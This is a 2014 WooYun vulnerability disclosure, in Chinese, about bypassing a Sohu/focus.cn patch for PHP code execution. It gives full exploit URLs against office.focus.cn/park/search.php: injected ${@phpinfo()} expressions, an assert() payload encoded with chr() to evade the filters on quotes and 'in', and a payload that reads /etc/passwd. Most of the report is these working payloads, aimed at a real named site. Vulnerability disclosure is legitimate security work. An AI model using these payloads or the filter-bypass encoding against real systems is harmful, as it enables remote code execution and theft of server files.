[公开漏洞]绕过搜狐补丁继续命令执行

来源：WooYun　浏览：1374次　时间：2014-07-25

绕过搜狐补丁继续命令执行相关厂商：搜狐漏洞作者：sql 提交时间：2014-06-09 21:55 公开时间：2014-07-24 21:56 漏洞类型：命令执行危害等级：高自评Rank：20 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签： php代码执行漏洞详情披露状态：

2014-06-09：细节已通知厂商并且等待厂商处理中
2014-06-09：厂商已经确认，细节仅向厂商公开
2014-06-19：细节向核心白帽子及相关领域专家公开
2014-06-29：细节向普通白帽子公开
2014-07-09：细节向实习白帽子公开
2014-07-24：细节向公众公开

简要描述：

绕过搜狐补丁继续命令执行

详细说明：

今晚本来想看看昨天提的sohu的那个命令执行看他是怎么修补的。

没成想

http://officeimg.focus.cn/ 这个站整个毙掉了。

QQ图片20140609212909.jpg

访问直接403

然后我google了下又找到一个 sohu的站同样的参数。

然后执行

http://office.focus.cn/park/search.php?city_code=110000&region_code=0&loopline=&business_circles=&property=&sale_status=0&office_name=$%7B@phpinfo()%7D

发现没出来信息。

看了下源码发现把in替换了。

经测试发现单引号也都过滤了。

不过这样就可以绕过

http://office.focus.cn/park/search.php?city_code=110000&region_code=0&loopline=&business_circles=&property=&sale_status=0&office_name=$%7B@assert(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41))%7D

通过这种方法还是读文件

例如读 /etc/passwd

http://office.focus.cn/park/search.php?city_code=110000&region_code=0&loopline=&business_circles=&property=&sale_status=0&office_name=$%7Bassert(var_dump

(file_get_contents(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100))))%7D